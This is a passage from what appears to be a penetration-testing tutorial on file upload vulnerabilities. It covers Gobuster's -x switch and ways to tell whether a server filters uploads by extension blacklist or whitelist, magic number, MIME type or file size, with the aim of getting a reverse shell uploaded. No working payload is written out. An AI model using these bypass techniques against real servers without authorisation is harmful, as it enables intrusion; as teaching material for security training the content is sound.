    • An important Gobuster switch here is the -x switch, which can be used to look for files with specific extensions. For example, if you added -x php,txt,html to your Gobuster command, the tool would append .php, .txt, and .html to each word in the selected wordlist, one at a time. This can be very useful if you've managed to upload a payload and the server is changing the name of uploaded files.
  • Having ascertained how and where our uploaded files can be accessed, we would then attempt a malicious file upload, bypassing any client-side filters we found in step two. We would expect our upload to be stopped by a server side filter, but the error message that it gives us can be extremely useful in determining our next steps.

Assuming that our malicious file upload has been stopped by the server, here are some ways to ascertain what kind of server-side filter may be in place:

  • If you can successfully upload a file with a totally invalid file extension (e.g. testingimage.invalidfileextension) then the chances are that the server is using an extension blacklist to filter out executable files. If this upload fails then any extension filter will be operating on a whitelist.
  • Try re-uploading your originally accepted innocent file, but this time change the magic number of the file to be something that you would expect to be filtered. If the upload fails then you know that the server is using a magic number based filter.
  • As with the previous point, try to upload your innocent file, but intercept the request with Burpsuite and change the MIME type of the upload to something that you would expect to be filtered. If the upload fails then you know that the server is filtering based on MIME types.
  • Enumerating file length filters is a case of uploading a small file, then uploading progressively bigger files until you hit the filter. At that point you'll know what the acceptable limit is. If you're very lucky then the error message of original upload may outright tell you what the size limit is. Be aware that a small file length limit may prevent you from uploading the reverse shell we've been using so far.